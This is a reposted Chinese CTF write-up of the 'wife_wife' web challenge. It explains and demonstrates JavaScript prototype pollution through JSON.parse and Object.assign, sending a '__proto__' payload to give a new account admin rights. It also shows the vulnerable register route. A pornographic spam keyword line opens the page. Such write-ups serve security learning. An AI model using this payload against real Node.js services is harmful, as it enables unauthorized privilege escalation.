国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【web | CTF】攻防世界 wife_wife

這篇具有很好參考價(jià)值的文章主要介紹了【web | CTF】攻防世界 wife_wife。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

目錄

步驟1:峰回路轉(zhuǎn)

步驟2:JavaScript原型鏈污染

步驟3:fuzz測(cè)試

總結(jié):題目意義


步驟1:峰回路轉(zhuǎn)

ctf攻防,CTF,前端

對(duì)英語無感的我一開始沒看到有個(gè)注冊(cè)的提示,還以為暴力破解,看了一下題目才知道不需要暴力破解

來到注冊(cè)頁面 ,就發(fā)現(xiàn)有點(diǎn)吊了,is admin可以勾選,居然能注冊(cè)管理員,有點(diǎn)搞笑,不切實(shí)際,正經(jīng)實(shí)戰(zhàn)的話哪來這功能?

那么懷疑點(diǎn)其實(shí)就應(yīng)該放在這里,畢竟有管理員權(quán)限相當(dāng)于無敵,通常邏輯都是要靠管理員權(quán)限才能拿到flag

ctf攻防,CTF,前端

?第一次沒勾選,直接注冊(cè),然后登錄,就拿到了flag,去試了試flag

ctf攻防,CTF,前端

?ctf攻防,CTF,前端

?flag是假的,被騙了,果然需要去懟admin才行

步驟2:JavaScript原型鏈污染

后來也沒做出來,去看了別人的wp才知道是JavaScript原型鏈污染攻擊

造成這個(gè)漏洞的有一個(gè)很重要的前提,這題目的后端是node.js來寫的,也就是說后端不是php服務(wù)器,不是java服務(wù)器,而是JavaScript服務(wù)器

因?yàn)槭荍avaScript語言來處理后端+用JavaScript的那個(gè)函數(shù)來處理,所以才有這個(gè)漏洞產(chǎn)生

JavaScript原型鏈污染詳細(xì)學(xué)習(xí)鏈接在此:JavaScript 原型鏈污染 | Drunkbaby's Blog

我們來看最重要的部分,如果是在代碼中正常生成的對(duì)象,是沒有污染了

baseUser = {
    a:1
}
user = {
    a:2,
    b:1,
    __proto__:{
        c:3
    }
}

// 這個(gè)函數(shù)的作用:淺復(fù)制一個(gè)對(duì)象,第一個(gè)參數(shù)位是對(duì)象的內(nèi)容,后面的參數(shù)位是多個(gè)對(duì)象內(nèi)容疊加進(jìn)去,進(jìn)行復(fù)制出一個(gè)全新的對(duì)象
let newUser = Object.assign({}, baseUser, user)  
// 無污染,結(jié)果正常
console.log(newUser)  // {a: 2, b: 1}  
// 無污染,結(jié)果正常
console.log(newUser.__proto__)  // {constructor: ?, __defineGetter__: ?, __defineSetter__: ?, hasOwnProperty: ?, __lookupGetter__: ?, …}

可問題是,后端服務(wù)器是JavaScript,我們通過post發(fā)送過去的 json是字符串,JavaScript需要通過JSON.parse()函數(shù)才能把 json字符串轉(zhuǎn)成對(duì)象

baseUser = {
    a:1
}

// 這次使用函數(shù)把json字符串轉(zhuǎn)成對(duì)象,就出問題了,
user = JSON.parse('  {"a" : 2 , "b" : 3 , "__proto__" : { "c" : 4 }}  ')
// 這個(gè)函數(shù)的作用:淺復(fù)制一個(gè)對(duì)象,第一個(gè)參數(shù)位是對(duì)象的內(nèi)容,后面的參數(shù)位是多個(gè)對(duì)象內(nèi)容疊加進(jìn)去,進(jìn)行復(fù)制出一個(gè)全新的對(duì)象
let newUser = Object.assign({}, baseUser, user)


console.log(newUser)  // {a: 2, b: 1}  ,__proto__是隱藏屬性,是不會(huì)直接顯示的
console.log(newUser.__proto__) // {c: 4}  ,但是一打印就出來了
console.log(newUser.c) // 4  ,已經(jīng)被污染了,這個(gè)屬性是一直存在的

大家可以自行復(fù)制粘貼去試試

步驟3:fuzz測(cè)試

看wp源代碼才知道,這個(gè)后端是沒有數(shù)據(jù)庫(kù)的,sql注入就別想了

我們來看看代碼講什么,每一行我都寫注釋了

// post請(qǐng)求的路徑
app.post('/register', (req, res) => {

    let user = JSON.parse(req.body)  // 把我們輸入的賬號(hào)密碼,從json字符串轉(zhuǎn)成對(duì)象

    // 判斷我們有沒有輸入賬號(hào)和密碼
    if (!user.username || !user.password) {  
        return res.json({ msg: 'empty username or password', err: true })
    }
    // 判斷賬號(hào)是否存在總對(duì)象的username里,如果相同的username就是重復(fù)用戶名了
    if (users.filter(u => u.username == user.username).length) {  
        return res.json({ msg: 'username already exists', err: true })
    }
    // isAdmin是否true 與 邀請(qǐng)碼是不是等于這個(gè)常量,所以sql注入沒用,邀請(qǐng)碼是個(gè)常量
    if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
        return res.json({ msg: 'invalid invite code', err: true })
    }

    // 使用系統(tǒng)函數(shù)復(fù)制對(duì)象,打包成一個(gè)新的對(duì)象
    let newUser = Object.assign({}, baseUser, user)
    users.push(newUser)  // 存到總對(duì)象里
    res.json({ msg: 'user created successfully', err: false })  // 設(shè)置返回信息
})

看了這部分源碼能判斷出,如果這個(gè)登陸的對(duì)象里,isAdmin的屬性是true,那就證明是一個(gè)管理員,如果是普通注冊(cè)的用戶,isAdmin屬性是false

那么直接污染即可

ctf攻防,CTF,前端

ctf攻防,CTF,前端

?注冊(cè)了管理員賬號(hào)后,進(jìn)去之后的flag也變了,這次flag才是真的

?但這在比賽的時(shí)候是沒有源碼給你看的,所以應(yīng)該是相當(dāng)?shù)碾y,需要fuzz測(cè)試

總結(jié):題目意義

我暫時(shí)沒搞明白這題目意義何在,好像跟實(shí)戰(zhàn)有點(diǎn)偏離的太遠(yuǎn)了,用JavaScript服務(wù)器來處理登錄?賬號(hào)密碼不存放數(shù)據(jù)庫(kù)?存緩存里?能讓所有人注冊(cè)管理員賬號(hào)?太扯淡了文章來源地址http://www.zghlxwxcb.cn/news/detail-731119.html

到了這里,關(guān)于【web | CTF】攻防世界 wife_wife的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 攻防世界ctf題目easyupload做題筆記。

    攻防世界ctf題目easyupload做題筆記。

    剛刷完upload-labs靶場(chǎng),做做ctf題目,發(fā)現(xiàn)自己掌握的知識(shí)并不牢固。做了半天沒有解出來,最后還是看別人的題解做出來的。寫下做題過程,也就是wp吧。為了方便以后復(fù)習(xí)鞏固。 本題的主要考點(diǎn)為利用fastcgi的.user.ini特性進(jìn)行任意命令執(zhí)行 這里需要繞過的點(diǎn)如下 檢查文件內(nèi)

    2024年02月01日
    瀏覽(19)
  • CTF wed安全(攻防世界)練習(xí)題

    CTF wed安全(攻防世界)練習(xí)題

    進(jìn)入網(wǎng)站如圖: 翻譯:在這個(gè)小小的挑戰(zhàn)訓(xùn)練中,你將學(xué)習(xí)Robots exclusion standard。網(wǎng)絡(luò)爬蟲使用robots.txt文件來檢查它們是否被允許抓取和索引您的網(wǎng)站或只是其中的一部分。 有時(shí)這些文件會(huì)暴露目錄結(jié)構(gòu),而不是保護(hù)內(nèi)容不被抓取。 好好享受吧! ? 步驟一: 進(jìn)入robots.txt文

    2024年04月17日
    瀏覽(28)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 backup 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 backup 解題詳析

    題目描述:X老師忘記刪除備份文件,他派小寧同學(xué)去把備份文件找出來,一起來幫小寧同學(xué)吧! PHP 腳本文件的備份文件名,通常采用以下命名方式: 在原始文件名后添加日期時(shí)間戳。例如,如果要備份名為 index.php 的文件,則可以將其備份文件命名為 index_20230521_004017.php。這

    2024年02月05日
    瀏覽(17)
  • [CTF/網(wǎng)絡(luò)安全]攻防世界 easyupload 解題詳析

    [CTF/網(wǎng)絡(luò)安全]攻防世界 easyupload 解題詳析

    題目描述:一名合格的黑客眼中,所有的上傳點(diǎn)都是開發(fā)者留下的后門 慣例,上傳一句話木馬 回顯如下: 也就是說文件被過濾 抓包改后綴,.php1~.php9、.htaccess均被過濾(.htaccess 文件是一個(gè)用于配置 Apache Web 服務(wù)器的配置文件。它通常位于網(wǎng)站根目錄或特定目錄中,用來為該

    2024年02月08日
    瀏覽(14)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 cookie 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 cookie 解題詳析

    題目描述:X老師告訴小寧他在cookie里放了些東西,小寧疑惑地想:這是夾心餅干的意思嗎? 根據(jù)提示,獲取頁面Cookie中的數(shù)據(jù)即可 頁面提示 look here:cookie.php ,于是GET /cookie.php : 提示 查看HTTP響應(yīng) method 1 HTTP響應(yīng)通??梢栽跒g覽器的開發(fā)者工具中找到。 按下F12鍵打開瀏覽器

    2024年02月05日
    瀏覽(21)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 PHP2 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 PHP2 解題詳析

    翻譯: 你能給這個(gè)網(wǎng)站進(jìn)行身份驗(yàn)證嗎? index.php是一個(gè)常見的文件名,通常用于Web服務(wù)器中的網(wǎng)站根目錄下。它是默認(rèn)的主頁文件名,在訪問一個(gè)網(wǎng)站時(shí),如果沒有特別指定頁面文件名,則服務(wù)器會(huì)自動(dòng)加載index.php文件。 在Web應(yīng)用程序中,index.php文件通常是網(wǎng)站的入口文件

    2024年02月13日
    瀏覽(27)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 view_source 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 view_source 解題詳析

    題目描述:X老師讓小寧同學(xué)查看一個(gè)網(wǎng)頁的源代碼,但小寧同學(xué)發(fā)現(xiàn)鼠標(biāo)右鍵好像不管用了。 單擊鼠標(biāo)右鍵,點(diǎn)擊查看頁面源代碼: 使用瀏覽器菜單:不同的瀏覽器可能會(huì)在不同的位置提供查看頁面源代碼的選項(xiàng)。 以Firefox為例,打開應(yīng)用程序菜單即可: 使用快捷鍵:幾乎

    2024年02月13日
    瀏覽(27)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 fileinclude 解題詳析(php偽協(xié)議)

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 fileinclude 解題詳析(php偽協(xié)議)

    由于index.php在/var/www/html目錄下,而flag.php與index.php同為php文件,故猜想flag.php也在該目錄下。 查看頁面源代碼獲取更多信息: 源代碼中看到 @include($lan.\\\".php\\\"); ,即此處存在文件包含。 又因?yàn)?$lan = $_COOKIE[\\\'language\\\']; 因此解題思路為:利用php偽協(xié)議,構(gòu)造language參數(shù),來讀取該目

    2024年02月07日
    瀏覽(24)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 php_rce 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 php_rce 解題詳析

    PHP RCE 指的是通過遠(yuǎn)程代碼執(zhí)行漏洞(Remote Code Execution)來攻擊 PHP 程序的一種方式。簡(jiǎn)單來說,由于PHP應(yīng)用程序沒有正確處理外部輸入數(shù)據(jù)(如用戶提交的表單、請(qǐng)求參數(shù)等),攻擊者通過某些手段向 PHP 應(yīng)用程序中注入惡意代碼,然后通過這些惡意代碼實(shí)現(xiàn)對(duì)受攻擊服務(wù)器

    2024年02月06日
    瀏覽(24)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 weak_auth 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 weak_auth 解題詳析

    題目描述:小寧寫了一個(gè)登陸驗(yàn)證頁面,隨手就設(shè)了一個(gè)密碼。 weak_auth翻譯: 弱認(rèn)證 這個(gè)術(shù)語通常用來描述一種較弱的安全認(rèn)證方法或機(jī)制,它可能存在安全漏洞,易受到攻擊或者被繞過。 在信息安全領(lǐng)域中,弱認(rèn)證是一種常見的安全威脅。例如,使用簡(jiǎn)單的密碼或者未加

    2024年02月13日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包